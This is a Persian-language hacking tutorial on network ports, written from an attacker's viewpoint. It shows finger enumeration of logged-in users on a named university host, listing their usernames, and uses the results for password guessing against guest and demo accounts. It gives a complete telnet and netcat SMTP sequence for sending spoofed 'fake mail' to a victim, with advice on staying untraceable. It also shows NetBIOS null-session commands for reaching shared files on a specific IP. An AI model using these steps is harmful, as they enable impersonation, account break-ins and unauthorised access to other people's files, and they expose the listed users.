آشنایی با پورت ها به صورت کامل

[OBAID]

آشنایی با پورت ها به صورت کامل

پورت ۷۹ چيست؟

پورت ۷۹ را پورت finger مي گويند. کاربرد اين پورت به اوايل ايجاد اينترنت بر مي گرده و کاربردش مخصوص سيستم

عامل يونيکس بوده است (الان هم تقريبا فقط در خانواده سيستم های يونيکس اين پورت قابل استفاده است).

وقتي اين پورت روی سيستم عامل يونيکس باز باشه، مي شه با يک request ساده فهميد که از بين کساني که در آن

سيستم account دارند، کدام ها on هستند (يعني کدام ها به سيستم login شده اند). برنامه اي که پورت ۷۹ رو در

يک سيستم باز مي کنه، finger server مي گن و چون مختص سيستم عامل يونيکس است، مي تونين از عبارت

Finger Deamon استفاده کنين. حالا که پورت ۷۹ روي سيستم باز شد، شما مي تونين با اون ارتباط برقرار کنين.

- با پورت ۷۹ صحبت کنيم

همان طور که مي دانيد، براي صحبت کردن با پورت ها از دو برنامه telnet و nc ميشه استفاده کرد. در مورد پورت ۷۹ يه

نرم افزار ديگر به نام finger در تمام سيستم عامل های يونيکس و برخي سيستم عامل هاي ويندوز وجود دارد که

علاوه بر دو برنامه قبلي، اونم مي شه به کار برد.

فرض کنيد که مي خوام با پورت ۷۹ در کامپيوتری به اسم router2.iums.ac.ir ارتباط برقرا کنم. برای اين کار يکي از

سه دستور زير را استفاده مي کنم:

telnet router2.iums.ac.ir 79

nc -v router2.iums.ac.ir 79

finger .@router2.iums.ac.ir

دقت کنيد که در دو دستور اول شماره پورت مشخص شده ولي دستور آخري نه، چون دستور finger فقط براي

همين کار استفاده مي شه و نمي توان باهاش با پورت ديگه ای ارتباط برقرار کرد. ضمنا به ساختار دستور آخر توجه

کنيد.

بعد از اجرای دستور، جواب مي شنوم:

Line User Host(s) Idle Location

33 tty 33 whgh Async interface 0

34 tty 34 najahan Async interface 0

35 tty 35 sadf Async interface 0

36 tty 36 abokho Async interface 0

38 tty 38 whgh Async interface 0

39 tty 39 bzamani Async interface 0

40 tty 40 saeedmah Async interface 0

41 tty 41 mfaizi Async interface 0

42 tty 42 gourabi Async interface 0

43 tty 43 farhadz Async interface 0

44 tty 44 arbks Async interface 0

45 tty 45 mhalavi Async interface 0

46 tty 46 farhood Async interface 0

47 tty 47 staavoni Async interface 0

48 tty 48 whgh Async interface 0

66 vty 0 idle 0 217.218.84.58

Interface User Mode Idle Peer Address

نکته مهم اين است که اطلاعاتي که به کمک پورت ۷۹ به دست مي آد، خيلي بستگي به سروري داره که اين

اطلاعات رو مي فرسته. بعضي از سيستم ها علاوه بر نام افراد (username) که در اين مثال ديده مي شه، نام و نام

خانوادگي افراد، ساعت و محل login کردن و ... را نمايش مي دهند. اما چيزي که هميشه وجود دارد و مشترک

است، username هاست که از نقطه نظر يک هکر بسيار ارزشمند است. در اين مثال ما اکانت هايي به اسم

najahan ،whgh و ... در اين سرور وجود دارد و افراد مربوطه در حال حاضر login کرده اند. اگر اکانتي موجود باشد ولي

فرد مورد نظر در حال حاضر از آن اکانت وارد نشده باشد، نمايش داده نمي شود. اين ليست فقط براي اکانت های

فعال است. پس نتايجي که شما در ارتباط با اين سرور کسب مي کنيد، با نتايجي که من نوشتم متفاوت خواهد بود.

- اين اطلاعات به چه دردي مي خورد؟

اول اينو بگم که finger کردن، جزئي از مراحل Enumeration است (البته در حالت کاربرد legal يا قانوني). منظور از

عبارت Enumeration يا به طور خلاصه Enum، پيدا کردن ليست کاربران است.

فرض کنيد مي خواهيد يک ليست از پسورد ها را تست کنيد تا اينکه يکي شانسي درست در بياد (درست مثل دزدها

که يه سري کليد را تست مي کنن که يکي به قفل بخوره و باز کنه!) حالا سوال اينه که اين پسورد ها رو برای چه

username ي تست مي کنيد؟ جواب، username هايي است که با Enumeration به دست اومده است. پس اول با

Enumeration يه ليست پيدا مي کنيد و بعد تعداد زيادی پسورد رو روش تست مي کنيد (روش اين کارو بعدا مي گم).

کاربرد بعدی finger در رابطه با يک سري اکانت هاي خاص است. من هميشه وقتي به يک اکانت به اسم guest

برخورد مي کنم، هميشه پسوردهای guest يا libguest يا myguest و ... رو تست مي کنم که گاهي جواب ميده.

همين طور در مورد اکانتي به اسم demo پسورد demo را تست مي کنم و ... معمولا موسسات بزرگ پر است از اين

username هاي عمومي که حدس زدن پسورد مربوطه کار مشکلي نيست.

گفتم که بعضي سرورهاي finger نام و نام خانوادگي افراد را هم برايمان مي فرستند. چون بعضي از افراد متاسفانه

يا خوشبختانه از اين اطلاعات براي پسوردشون استفاده مي کنند، مي تونه مفيد باشه.

يک کاربرد ديگه و البته بسيار مهم موقعي است که مثلا مي خواهيد يک سري پسورد رو روي يک اکانت خاص تست

کنيد. من هميشه اول يک finger مي کنم که مطمئن بشم که فرد در حال حاضر login نکرده باشد و بعد اين کار رو

شروع مي کنم ( يعني انقدر صبر مي کنم که ديگه آن اسم خاص در finger نمايش داده نشه يعني طرف مقابل

logout کرده باشد!)

موضوعات مشابه:

• ایده هایی برای انتخاب کلمه عبور
• یک تبدیل کننده ویدیویی همه کاره
• بهترین برنامه تست و اشکال زدایی سیستم
• درختچه هایی که موبایل شارژ می کنند
• آشنایی با هارد دیسک

[OBAID]

پورت ۸۰ چيست؟

پورت ۸۰ يکی از مهم ترين پورت هاست. دنيای وب (صفحات اينترنتی) بر اساس همين پورت کار می کنه. توضيح اينکه

وقتی به يه سايت وصل می شيم و صفحه وب را درخواست می کنيم، در واقع مرورگر اينترنتی به پورت ۸۰ اون

کامپيوتر وصل می شه و اطلاعات رو می گيره (البته بعد از گرفتن اطلاعات اون رو تفسير می کنه و به صورت يه

صفحه نشون می ده - دقت کنيد که اطلاعات در واقع به صورت يک سری تگ HTML است ).

- با پورت ۸۰ صحبت کنيم

حالا ما میخواهيم با پورت ۸۰ يک کامپيوتر صحبت کنيم ولی به کمک telnet و nc.

اول بايد يه connection (اتصال) با پورت ۸۰ برقرار کنيم (مثلا برای سايت hotmail.com بايد بنويسم):

telnet كد:
[Only Registered and Activated Users Can See Links. Click Here To Register...]
80

nc -v كد:
[Only Registered and Activated Users Can See Links. Click Here To Register...]
80

پس اول بايد يکی از دستورات بالا را استفاده کنيم. من هميشه توصيه ام استفاده از nc بوده و خواهد بود.

حالا بايد شروع به صحبت با پورت ۸۰ کنيم. من فعلا دو تا جمله براتون می گم و بقيه اش بمونه واسه بعد. دقت کنيد

که موقع کار با پورت ۸۰ با تلنت (نه nc) دستوراتی که ما می نويسيم، نمايش داده نمی شود ولی کار می کنه.

۱- اولين جمله اينه: GET / HTTP/1.0 و بعدش دوتا Enter

به فاصله ها دقت کنيد. دو طرف / ی که بعد از GET است، فاصله وجود دارد. اين جمله به پورت ۸۰ می گه که هرچی

در header داره، نشون بده. و جواب می شنوم:

HTTP/1.0 302 Moved Temporarily

Server: Microsoft-IIS/5.0

Date: Thu, 05 Dec 2002 12:02:51 GMT

Location: كد:
[Only Registered and Activated Users Can See Links. Click Here To Register...]
X-Cache: MISS from cache5.neda.net.ir

Connection: close

۲- دومين جمله اينه: GET / what/ever و بعدش دوتا Enter

به فاصله ها دقت کنيد. اين دستور باعث ميشه که هر چی داره، رو کنه.

البته توجه کنيد که ما مسير را مشخص نکرديم. اين حالت که بدون مسير است خيلی وقت ها کار نمی کنه

(مثل همين مثال !!)

گاهی پيش می آد که يک سری دستورات خاص را هميشه بايد پشت سرهم به يه پورت خاص بفرستيم و بخواهيم

در وقت صرفه جويی کنيم. مثلا همين جمله GET / HTTP/1.0 و دو Enter پشت سرهم که هميشه استفاده

می کنيم.

در اين موارد می توان اين دستورات را در يک فايل تايپ کرد (همراه با Enter ها که بايد موقع نوشتن حتما بزنيد) و بعد

مثلا با نام ali.txt ذخيره کنيد و بعد يکی از دستورات زير را بنويسيم:

nc -v كد:
[Only Registered and Activated Users Can See Links. Click Here To Register...]
80 < ali.txt

type ali.txt | nc -v كد:
[Only Registered and Activated Users Can See Links. Click Here To Register...]
80

که همان کارهای بالايی را انجام ميده.

- حالا مي خوام مسير رو مشخص کنم

مثلا فرض کنيد که مي خوام فايلي به اسم index.html را از مسير startup در سايتي به اسم

كد:
[Only Registered and Activated Users Can See Links. Click Here To Register...]
کنيم. اول يه nc مي کنيم به سايت. بعد مي نويسيم:

GET /startup/index.html HTTP/1.0

بعد دو تا Enter مي زنيم.

اين مثال نشون ميده که چطوري مسير رو ميشه مشخص کرد. همين کار رو مي تونيم براي فايل هايي مثل فايل

هاي گرافيکي و ... انجام بديم و حتي مي تونيد اطلاعاتي که مي رسه رو در يک فايل ذخيره کنيد. براي اين کار

مي نويسيد:

nc -v كد:
[Only Registered and Activated Users Can See Links. Click Here To Register...]
80 > index.html

(اين کاري که کرديم با موردي که در بالا نوشتيم فرق مي کنه! در بالا دستورات GET رو تو يه فايل مي نوشتيم و

مي فرستاديم که اجرا بشه ولي الان داريم نتايجي که بر مي گرده رو در يک فايل ذخيره مي کنيم!) ميشه اين دوتا رو

ترکيب کرد مثلا نوشت:

nc -v كد:
[Only Registered and Activated Users Can See Links. Click Here To Register...]
80 < dastoorat.txt > index.html

پورت ۲۵

Posted by كد:
[Only Registered and Activated Users Can See Links. Click Here To Register...]
on Jan 18, 2005, 05:43

- خلاصه پروتکل های مرتبط با E-mail

SMTP :

روي پورت ۲۵ اجرا مي شد. از اين پروتکل براي ارسال E-mail استفاده می شود. اين پروتکل امروزه ديگه براي خوندن

E-mail استفاده نمي شه. اين پروتکل بحث امروز ماست.

POP3 :

اين پروتکل را روي پورت ۱۱۰ بحث مي کنيم و از آن براي خواندن E-mail هاي رسيده استفاده مي کنيم.

IMAP :
اين پروتکل به عنوان جايگزيني براي پروتکل POP3 به کار ميره. از نظر ساختاري کمي با پروتکل POP3 متفاوت است

ولي کارش همان است و براي خواندن E-mail هاي رسيده به کار مي رود.

Web-based Email: يک روش ديگه براي دسترسي به E-mail وجود دارد و آن استفاده از امکانات وب براي خواندن و

فرستادن E-mail است. وقتي شما از خود سايت yahoo يا hotmail براي کار با E-mail استفاده مي کنيد، در واقع

همين روش را به کار مي بريد. نکته قابل توجه آن است که اين روش کند تر از استفاده مستقيم از پروتکل هاست.

- پورت ۲۵ چيست؟

پورت ۲۵ براي ارسال E-mail به کار مي رود. اين پورت از پروتکل SMTP برای اين کار استفاده مي کند. نکته مهم آن

است که اين پروتکل توانايي خواندن E-mail را ندارد و فقط مي تواند E-mail بفرستد.

حالا سوالي که پيش مي آيد که چه برنامه هايي روی سرور پورت ۲۵ را باز مي کند؟

همان طور که گفتم، SMTP فقط يک پروتکل است (نه يک برنامه) و از نظر لغوی مخفف عبارت Simple Mail Transfer

Protocol است. برنامه ای که پورت ۲۵ را باز مي کند تا بتوان از طريق آن E-mail ارسال کنيم، SMTP Server مي گويند.

SMTP Server يک عبارت کلي است، برای اين نوع برنامه ها. حالا خود SMTP Server انواع مختلف دارد که

مشهورترين هايشان، SMail، SendMail، ESMTP MAIL Service و ... هستند. نکته مهم اين است که تفاوت زيادی

نيست که سرور مورد نظر ما از کداميک از اين نرم افزارها استفاده مي کند، زيرا اصول کار با آنها يکي است.

برای صحبت کردن با پورت ۲۵ اول بايد يک Server پيدا کنيم که پورت ۲۵ در آن باز باشد (اگرچه در اکثر سرورها پورت ۲۵

باز است). بعد بايد طبق معمول از telnet يا nc براي ارتباط استفاده کنيم.

پورت ۲۵ از ديدگاه يک هکر چه کاربردی دارد؟

يک هکر از پورت ۲۵ برای ارسال Fake Mail (ميل ناشناس، ميل تقلبي) استفاده مي کند. دليل آن است که درصد

بسيار بالايي از SMTP Server ها اهميتي نمي دهند که شما کي هستيد و به کي می خواهيد ميل بزنيد، بلکه فقط

کار خود را مي کنند.

[OBAID]

- چگونه يک SMTP سرور پيدا کنيم

پيدا کردن SMTP سرور کار سختي نيست. اگرچه از اکثر SMTP Server ها مي توان به هر کسي E-mail زد ولي من

هميشه توصيه مي کنم از SMTP Server ی استفاده کنيد که مربوط به به Mail Box قرباني است. برای مثال فرض

کنيد که مي خواهيد به کسي fake mail بزنيد و اون شخص mail box اش در ياهو است. در اين حالت من ترجيح

مي دم که از SMTP Server های سرور ياهو استفاده کنم ( اگرچه از هر سرور ديگری برای اين کار مي تونم استفاده

کنم ).

اگرچه ما عبارت fake mail (ناشناس) برای اين نوع E-mail ها استفاده مي کنيم ولي بايد توجه کنيد که در مواردی

خاص مي شود شما را رديابي کرد. به عنوان مثال ip شما از مواردی است که همراه با E-mail ارسال مي شود. پس

در انتخاب SMTP Server بايد دقت کرد (بعضي SMTP Server ها هستند که حتي ip شما را ارسال نمي کنند و اين

يعني نهايت ناشناسي).

نکته بعدی اين است که بعضي SMTP Server ها يه کم باهوش عمل ميکنند به طوری که در نهايت E-mail ارسالي

حداقل برای اشخاص حرفه ای ماهيتش (fake بودن) قابل تشخيص خواهد بود (يعني مي فهمند که اين يک fake mail

است نه يه E-mail واقعي). پس اين هم در انتخاب SMTP Server مهم است که بايد از SMTP Server هايي استفاده

کنيم که در نهايت حماقت باشند!

بازم يه نکته ديگه، SMTP Server در نهايت روی يک سرور قرار دارد پس در نهايت آدرس آن چيزی مثل mail.far30.com،

mx01.hotmail.com و ... خواهد بود.

حالا که معيارهای مهم برای انتخاب SMTP Server را شناختيم، حالا وقتش است که عملا يه SMTP Server پيدا کنيم:

۱- يکي از ساده ترين راه ها استفاده از سايت هايي مثل google است که با جستجوی عبارت SMTP Server هزاران

سرور پيدا کنيم.

۲- استفاده از SMTP Server سايت دانشگاه ها. تجربه برام ثابت کرده که اين روش يکي از بهترين هاست.

۳- استفاده از يک سری SMTP Server های مشهور. اين روش هم بد نيست.

حالا روش را عملا نشونتون مي دم:

اول بايد يک سرور را مشخص کنيد که از طريق آن مي خواهيد fake mail را بفرستيد. همان طور که قبلا گفتم اگر مثلا

مي خواهيد برای يه نفر که mail box او در ياهو است، fake mail بزنيد، سرور را همان سرور در نظر بگيريد يعني از

خود yahoo.com برای ارسال استفاده کنيد.

بعد بايد ببينيد که در اين سرور کدام subdomain بايد استفاده کنيد (يعني اينکه SMTP Server سرور آدرسش،

mail.yahoo.com است يا mx.yahoo.com است يا چيز ديگر). برای اين کار دو روش را مي گم:

۱- از nslookup استفاده کنيم:

با nslookup قبلا آشنا شده ايد. اول بايد با whois يک name server پيدا مي کرديم و بعد از طريق آن سايت را

nslookup مي کرديم (اگر فراموش کرده ايد، درس ۵ و ۶ را دوباره بخوانيد. مثلا مي خواهم SMTP Server مربوط به

far30.com را پيدا کنم. اول يک whois مي کنم و مي بينم که name server سايت، s1.sazin.com و s2.sazin.com

است. حالا nslookup مي کنم و آن سطر هايي را مي خوانم که با نام MX مشخص شده است و ۲ تا آدرس مي بينم

که عبارتند از far30.com و mail.far30.com پس SMTP Server های سايت far30.com همين دو آدرس است. در نتيجه

اگر بخواهم از سايت far30.com برای ارسال fake mail استفاده کنم، از اين آدرس ها بايد بهره گيرم.

۲- استفاده از بعضي سايت های خاص:

يکي از اين سايت ها كد:
[Only Registered and Activated Users Can See Links. Click Here To Register...]
است. در اين سايت، نام سايت را

مي نويسيد و دکمه lookup را کليک مي کنيد. مثلا من نوشتم yahoo.com و به نتايج زير رسيدم:

Domain Server: ns.mob.net

yahoo.com mail is handled by 5 mx4.mail.yahoo.com.

yahoo.com mail is handled by 1 mx1.mail.yahoo.com.

yahoo.com mail is handled by 1 mx2.mail.yahoo.com.

Domain Server: ns.cw.net

yahoo.com mail is handled by 5 mx4.mail.yahoo.com.

yahoo.com mail is handled by 1 mx1.mail.yahoo.com.

yahoo.com mail is handled by 1 mx2.mail.yahoo.com.

مشخص است که SMTP Server های سايت yahoo.com عبارتند از: mx1.mail.yahoo.com , mx2.mail.yahoo.com ,

mx4.mail.yahoo.comاگرچه اين روش راحت تر به نظر مي رسد ولي شما را يه انسان مصرفي بار مي آورد نه خلاق !

- با پورت ۲۵ صحبت کنيم

حالا که SMTP Server دارم مي تونم fake mail بزنم.

به عنوان مثال مي خواهم به آدرس target@yahoo.com يک fake mail بزنم که شخص فکر کند که

Email از آدرس me@hotmal.com آمده است. (دقت کنيد که اين آدرس هر چيزی مي تواند باشد. مثلا

مي توانيد از طرف Bill Gates به يه نفر E-mail بزنيد). و مي خواهم Subject آن باشد: arze salam و متن پيغام اين

باشد: bah bah sam aleikum برای اين کار :

۱- چون mail box قرباني در سايت ياهو است، پس من هم بهتر است از SMTP Server خود ياهو استفاده کنم (بهتر

است ولي اجباری در آن نيست). SMTP Server های ياهو را در قسمت قبلي به دست آوردم. مثلا از

mx1.mail.yahoo.com استفاده مي کنم.

۲- بايد از telnet يا nc برای برقراری ارتباط استفاده کنم. الان مي خوام از telnet استفاده کنم. پس بايد دستور زير را

به کار برم (دقت کنيد که از اسم SMTP Serevr استفاده کردم).

telnet mx1.mail.yahoo.com 25

بعد از تايپ دستور، صفحه پاک مي شود و جواب مي گيرم:

220 YSmtp mta499.mail.yahoo.com ESMTP service ready

۳- حالا دستور زير را مي نويسم. دقت کنيد که چون از telnet استفاده مي کنيد، چيزهايي را که تايپ مي کنيد،

نمي بينيد و اينکه نمي تونيد از دکمه BackSpace استفاده کنيد (پس در تايپ کردن دقت کنيد!):

HELO yahoo.com

اين دستور يعني من از کجا هستم (يعني شما که مي خواهيد ميل بزنيد، کي هستيد). اينجا من گفتم که من از

سايت yahoo.com هستم!! معمولا مهم نيست که جلوی عبارت HELO نام چه سايتي را بنويسيد چون اکثرا چک

نمي شود. و جواب مي شنوم:

250 mta499.mail.yahoo.com

۴- حالا بايد مشخص کنم که E-mail فرستنده (يعني من) چيست. چون مي خواهم E-mail از طرف

me@hotmail.com

به نظر بيايد، مي نويسم:

MAIL FROM: <me@hotmail.com>

و جواب مي گيرم:

250 sender <reza@bedehi.com> ok

۵- حالا بايد بگم که اين E-mail به چه آدرس ارسال شود که در اين مثال، target@yahoo.com است. بايد بنويسم:

RCPT TO: <target@yahoo.com>

و جواب مي شنوم:

250 recipient <target@yahoo.com> ok

۶- حالا بايد بنويسم،

DATA

و Enter بزنم و جواب مي شنوم:

354 go ahead

اينجا وقت تايپ کردن يک سری چيز های اساسي است. اول مي نويسم،

From: abbas akbari <me@hotmail.net>

اين همان اسمي است که به عنوان Sender يا همان From ديده خواهد شد. من خواستم که به اسم abbas akbari

ديده شود. حالا مي نويسم:

Subject: arze salam

اين هم در آن E-mail به عنوان subject خواهد بود. حالا موارد زير را مي نويسم (که اختياري است):

MIME-Version: 1.0

Content-Type: text/plain;

و بعد دوتا !! Enter زده و متن نامه را مي نويسم:

bah bah

sam aleikum

دقت کنيد که يک کاراکتر . (نقطه) در سطر آخر نوشتم و بعد Enter زدم. با اين روش به پورت ۲۵ حالي مي کنم که متن

نامه تمام شده است و نامه ارسال شود. متعاقبا پيغامي مي گيرم که بيانگر ارسال E-mail است.

250 ok dirdel

۷- مي نويسم: QUITتا ارتباط قطع شود و از telnet خارج بشم.

اول توصيه مي کنم که يک fake mail واسه خودتون بفرستيد تا ماهيت fake mail را درک کنيد.

مسئله بعدی آن است که در قسمتي target@yahoo.com نوشته شده است، شما بايد اين سطر را تغيير داده و

E-mail قرباني خودتان در ياهو را بنويسيد!

- همان کار با nc

برای انجام اين کار با nc اول همان دستورات بالا را در فايلي مثلا به اسم fake.txt مي نويسيم :

HELO yahoo.com

MAIL FROM: <me@hotmail.com>

RCPT TO: <target@yahoo.com>

DATA

From: abbas akbari <me@hotmail.net>

Subject: arze salam

MIME-Version: 1.0

Content-Type: text/plain;

bah bah

sam aleikum

QUIT

حالا فايل را ذخيره کرده و از دستور زير استفاده مي کنم:

nc -v mx1.mail.yahoo.com 25 < fake.txt

همين!

[OBAID]

- Fake mail در صندوق پستي به چه شکلي ظاهر مي شود؟

اين قسمت رو در مورد mail box های yahoo و hotmail توضيح مي دم.

اينکه اين نوع E-mail ها به چه شکلي ظاهر مي شود، بستگي به اين دارد که تنظيمات mail box قرباني در چه حالتي

تنظيم شده باشد. در حالت معمول فقط تعدادی از header ها نمايش داده مي شود. در اين حالت معمولا fake mail

مثل يک E-mail معمولي ديده مي شود.

From: "abbas akbari" <me@hotmail.net>

Subject: arze salam

bah bah

sam aleikum

در mail box ها مي توان تنظيمات را طوری انجام داد که تمام header ها نمايش داده شوند.

برای اينکار در yahoo از منويي که بالای صفحه است، منوی Mail را باز کرده و گزينه Options را کليک مي کنيم. در

صفحه ای که مي آيد، روی گزينه General Preferences کليک کنيد. در صفحه ای که مي آيد، از قسمت Message در

قسمت Headers گزينه ... Show all را انتخاب مي کنيم و دکمه Save را از پايين صفحه کليک مي کنيم. حالا همان

ميل را دوباره باز مي کنم و مشاهده مي کنم که به شکل زير ظاهر مي شود:

From abbas akbari Mon Jan 6 0537 2003

X-Apparently-To: ali1000vali2000@yahoo.com via 216.136.129.53; 06

Jan 2003 0537 -0800 (PST)

Return-Path:

Received: from 217.218.84.27 (HELO yahoo.com) (217.218.84.27) by

mta576.mail.yahoo.com with SMTP; 06 Jan 2003 0537 -0800 (PST)

From: "abbas akbari" <me@hotmail.net>

Subject: arze salam

MIME-Version: 1.0

Content-Type: text/plain;

Content-Length: 19

bah bah

sam aleikum

در اين حالت مي توانيد ip ارسال کننده را هم ببينيد. (سعي کنيد که هميشه تنظيمات yahoo mailbox تان به اين

شکل باشد)

- پورت ۱۱۰ چيست؟

پورت ۱۱۰ براي پروتکل POP3 استفاده مي شود. عبارت POP3 مخفف Post Office Protocol Version 3 است که اين

پروتکل براي خواندن E-mail استفاده مي شود. براي کار با اين پروتکل بايد آدرس POP Server مربوط به E-mail خود را

بدانيد. براي اين کار مي توان از nslookup استفاده کرد و سطري که عبارت MX دارد را خواند (قبلا چگونگي کار را گفتم

و الان ديگه توضيح نمي دم). دقت کنيد که در مورد سايت هاي کوچک، آدرس POP Server همان آدرس SMTP Server

است ولي در سايت هاي بزرگ (مثل ياهو ) سرور هاي مربوطه جداست ( يعني دو اسم مختلف دارد ). در مورد

سايت ياهو POP Server در آدرس pop.mail.yahoo.com قرار دارد. ( من جديدا اين سرور رو تست نکردم، خودتون

تست کنيد و مطمئن بشيد ). من امروز مي خوام از E-mail هاي سايت noavar.com استفاده کنم که هم خيلي

عاليه و هم ايرانيه! POP Server اين سايت در آدرس mail.noavar.com قرار دارد.

- با پورت ۱۱۰ صحبت کنيم

فرض کنيد که من در سرور mail.noavar.com يک اکانت به اسم araztest و پسورد mypass دارم. (شما هم اگه

مي خواهيد تست کنيد، يک اکانت براي خودتون در اين سايت باز کنيد). حالا مي خوام با پورت ۱۱۰ صحبت کنم،

بنابراين از يکي از دو دستور زير استفاده مي کنم:

telnet mail.noavar.com 110

nc -v mail.noavar.com 110

و جواب مي شنوم:

+OK POP3 server كد:
[Only Registered and Activated Users Can See Links. Click Here To Register...]
ready

دقت کنيد که اگه از تلنت استفاده کنيد،چيزهايي که شما تايپ مي کنيد، ديده نمي شود و نمي تونيد از دکمه

Backspace استفاده کنيد. حالا مي خوام بگم که اسم اکانت من araztest است، پس مي نويسم:

user araztest

و جواب مي شنوم:

+OK Please enter password for araztest

حالا مي خوام پسوردم رو بگم که اجازه صادر بشه! مي نويسم:

pass mypass

و جواب مي شنوم:

+OK password for user araztest Accepted

حالا مي خوام بدونم که جمعا چندتا mail رسيده است و حجم کل چقدر است. مي نويسم:

stat

و جواب مي شنوم:

+OK 2 25924

يعني براي من ۲ تا پيغام رسيده و حجم کل پيام هاي رسيده، ۲۵۹۲۴ بايت است. حالا مي خوام ليست پيام ها رو

داشته باشم، مي نويسم:

list

و جواب مي شنوم:

+OK

1 70

2 24923
.

اين يعني پيغام شماره يک (پيغام جديدتر) حجم ۷۰ بايت دارد و پيغام شماره دو حجم ۲۴۹۲۳ بايت دارد. حالا مي خوام

پيغام شماره ۱ را بخونم. مي نويسم:

retr 1

و جواب مي شنوم:

+OK 70 octets

Message-ID: <875808060@www.noavar.com>

From: "ali"

X-Mailer: Noavar

To: araztest@noavar.com

MIME-Version: 1.0

Subject: salam

Date: Thu, 13 Feb 2003 20:05:56

salam, chetori?
.

حالا مي خواهم اين پيغام ( شماره يک ) رو پاک کنم، مي نويسم:

dele 1

و جواب مي شنوم:

+OK Message 1 Marked for removal

دقت کنيد که اين پيغام هنوز پاک نشده است و فقط علامت خورده که موقع خروج، پاک بشه. حالا ممکنه چندتا پيغام

را مارک کنيد که حذف بشه ولي بعد بي خيال! مي شين. براي اينکه اين علامت ها را حذف کنيد که موقع خروج ديگه

پاک نشوند، مي تونيد بنويسيد:

rset

و جواب مي شنوم:

+OK 1 70


حالا اگه بخواهم خارج بشم (و علامت خورده ها پاک بشن)، مي نويسم:

quit

و جواب مي شنوم:

+OK كد:
[Only Registered and Activated Users Can See Links. Click Here To Register...]
signing off

- NetBIOS چيست؟

NetBIOS مخفف عبارت Network Basic Input/Output System است. NetBIOS ابزاري است که اجازه به اشتراک

گذاشتن منابع رو به ما مي ده. ما برای به اشتراک گذاشتن فايل ها و يا پرينتر مي تونيم از اين پروتکل استفاده کنيم.

نکته مهم اين است که NetBIOS فقط در سيستم عامل ويندوز معني داره (اگرچه ابزارهايي مثل Samba در لينوکس

مي تونن اونو شبيه سازي کنن ولي بحث ما خود پروتکل NetBIOS است). وقتي NetBIOS در ويندوز فعال باشد،

بلافاصله سه تا پورت براي استفاده باز مي شوند. پورت مهم و اصلي پورت ۱۳۹ در tcp است که NetBIOS را هم با اين

پورت مي شناسن. دو پورت ديگر، از نوع udp هستند و عبارتند از پورت ۱۳۷ براي name service و پورت ۱۳۹ براي

Datagram service . وقتي قرار باشه که يک سيستم عامل ويندوز هک بشه ( خصوصا اگه کلاينت باشه ) يکي از

اولين مواردي که به ذهن مي رسه، استفاده از NetBIOS ه.

حالا ببينيم منظور از به اشتراک گذاشتن (Sharing) در مورد فايل ها و پرينتر ها چيست؟

به اشتراک گذاشتن در مورد فايل ها يعني قرار دادن تعدادي فايل در يک کامپيوتر خاص به طوريکه توسط ساير

کامپيوترها قابل دسترسي و استفاده باشه. در مورد پرينتر به اشتراک گذاشتن يعني طوري چاپگر متصل به يک

کامپيوتر را تنظيم کنيم که توسط ساير کامپيوتر ها هم قابل استفاده باشه. با توجه به اينکه در سيستم عامل هاي

ويندوز به صورت پيش فرض NetBIOS فعال است، پس مي توان به تعدادي از فايل ها و فولدرهاي تعدادي از

کامپيوترهاي روي شبکه دسترسي داشت و فايل ها را خواند و حتي کپي يا پاک کرد.

- چگونه با پورت ۱۳۹ صحبت کنيم؟

۱- اولين کاري که مي کنيم اين است که براي پورت ۱۳۹ پورت اسکن مي کنيم تا ip هايي را که پورت ۱۳۹ در آنها باز

است، پيدا کنيم. من اين کار را با nmap انجام مي دم. فرض کنيد که يک ip به شماره 217.218.84.29 را تست کرده و

به نتيجه زير برسم:

Interesting ports on HOME-TU6U0AV86Y (217.218.84.29):

Port State Service

139/tcp open netbios-ssn

Remote operating system guess: Windows Millenn... (Me), Win 2000, or WinXP

اين خروجي اعلام مي کند که پورت ۱۳۹ باز است. پس مي شود از اين ip استفاده کرد.

۲- حالا مي خوام با اين پورت ارتباط برقرار کنم. اصولا بايد مثل سابق از telnet يا nc استفاده کنم ولي در مورد پورت

۱۳۹ روش ارتباطي فرق مي کند. کامنت پرامت را باز کرده و دستور زير را مي نويسم:

nbtstat -A 217.218.84.29

دستور nbtstat يک ابزار خاص براي کار با NetBIOS است. دقت کنيد که از پارامتر A- با ip مربوطه استفاده کردم.

(دستور nbtstat داراي پارامتر هاي بسياري است که اگه مي خواين همه رو ببينين، بنويسين nbtstat و enter را بزنيد.)

حالا بحث اينه که اين دستور چه کاري مي کنه و خروجي به چه صورتي است:

اين دستور به ip مورد نظر وصل مي شه و از اون مي خواد ليست منابعي رو که به اشتراک گذاشته رو ليست کنه. در

اين حالت ۲ حالت ممکنه اتفاق بيوفته:

الف) مواجه با پيغام Host not found بشم. اين يعني اينکه نمي تونه ليست منابع را از اون کامپيوتر بگيره (يعني

NetBIOS غير فعاله). يعني اگرچه پورت ۱۳۹ بازه ولي قابل استفاده نيست.

ب) ارتباط برقرار بشه و ليست منابع اشتراکي ليست بشه:

NetBIOS Remote Machine Name Table

Name Type Status

HOME-TU6U0AV86Y<00> UNIQUE Registered

MSHOME <00> GROUP Registered

HOME-TU6U0AV86Y<20> UNIQUE Registered

MSHOME <1E> GROUP Registered

MAC Address = 00-53-45-00-00-00

۳- در اين نتايج چيزي که به درد مي خوره، سطري است که <20> دارد. اگه <20> نباشد، يعني نمي تونين از اشتراک

گذاري فايل استفاده کنيد ( به عبارت ساده تر بي خيال شو اين کامپيوتر رو ! ). در اين مثال ما اين سطر را داشتيم پس

ادامه مي دهيم. حالا مي نويسم:

net view \\217.218.84.29

حالا اگه گفتين چي ميشه؟ درسته! دو حالت ممکنه اتفاق بيوفته:

الف) پيغام بياد

System error 5 has occurred.

Access is denied.

اين يعني نمي تونين ادامه بدين. به عبارت ديگه ايست! ولي يه کاري مي تونيد بکنيد و اون اينه که يه null session

برقرار کنيد با اون کامپيوتر. اين حالت در مورد ويندوز هاي سري NT جواب ميده. مي نويسيد:

net use \\217.218.84.29\IPC$ "" /user:""

حالا چرا مي گن null session ؟ دليلش اينه که يک ارتباط برقرار کردم با اون ip بدون username و بدون password . حالا

اگه اين دستور جواب داد مي تونم دوباره دستور net view \\217.218.84.29 را تکرار کنم.

ب) ممکنه دستور ذکر شده جواب بده و مثلا جواب بده:

Shared resources at \\217.218.84.29

Share name Type Used as Comment

Printer Print Acrobat PDFWriter

Printer2 Print Acrobat Distiller

SharedDocs Disk

The command completed successfully.

عاليه. دقت کنيد که در اين کامپيوتر يک فايل (Disk) به اسم ShareDocs به اشتراک گذاشته شده (دو تاي باقي براي

پرينتر است). حالا که رسيدم به اين اسم ديگه آخرين دستور را مي نويسم.

